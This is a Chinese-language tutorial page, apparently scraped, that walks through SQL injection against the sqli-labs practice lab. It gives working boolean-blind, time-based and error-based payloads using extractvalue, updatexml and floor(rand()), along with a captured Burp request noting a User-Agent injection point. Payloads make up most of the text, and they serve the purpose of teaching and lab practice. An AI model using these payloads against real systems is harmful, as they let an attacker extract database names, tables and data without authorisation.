赞
踩
目录
由以上的返回结果可以看到可以正常执行。
http://192.168.1.101/sqli-labs/Less-8/?id=1' and (ascii(substr(database(),1,1)) =115) --+
最终数值 115 对照 ASCII 表
一共有 8 位所以我们要猜 8 次,这里只是为了讲解原理,实际场景中我们使用 SQLMAP 来进行自动化探测。结论最终=(等号)测出来的数据对照 ASCII 表即可得出准确的数据。
sleep(3)表示进程休眠 3 秒。时间可以任意修改。但是为了不影响效率可以尽可能的缩短时间。
extractvalue(xml_document,xpath_string)
第一个参数是xml文档对象的名称
第二个参数作用是从xml文档对象中返回查询到的字符串值,返回结果长度限制在32位字符。
http://192.168.1.101/sqli-labs-master/Less-5/?id=1' and extractvalue(null,concat(0x7,(sqli_inject),0x7e))--+
sqli_inject = select group_concat(table_name) from information_schema.tables where table_schema='security'
注:利用extractvalue()对数据进行一个排序,指定第一个参数为null,可以换成1、#或者其他符号,使其报错,并执行第二个参数语句。0x7e表示”~“号。
注意:前面说过extractvalue()最大返回长度为32,所以可以用limit N,1 一行一行的回显。
如:sqli_inject = select table_name from information_schema.tables where table_schema='security' limit 0,1
updatexml(xml_document,xpath_string,new_value)
第一个参数,xml文档名称
第二个参数,xpath格式字符串
第三个参数,替换查找到的符合条件的数据
作用是,改变文档中符合条件的节点的值
payload:updatexml(1,concat(0x7e,(sqli_inject),0x7e),1)
http://192.168.1.101/sqli-labs/Less-5/?id= 0' union select 1,2,3 from (select
count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit
0,1),floor(rand(0)*2)) x from information_schema.tables group by x) root--+
bp抓取
POST /sqli-labs/Less-18/ HTTP/1.1
Host: 192.168.1.105
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://192.168.1.105
Connection: close
Referer: http://192.168.1.105/sqli-labs/Less-18/
Upgrade-Insecure-Requests: 1
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0uname=admin&passwd=admin&submit=Submit
[root@localhost ~]# echo "uname=admin&passwd=admin&submit=Submit" |wc -L
[root@localhost ~]# vim /var/www/html/sqli-labs/Less-18/index.php
分析 User-Agent 中存在注入点,页面回显有报错信息,所以这里可以使用报错注入。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。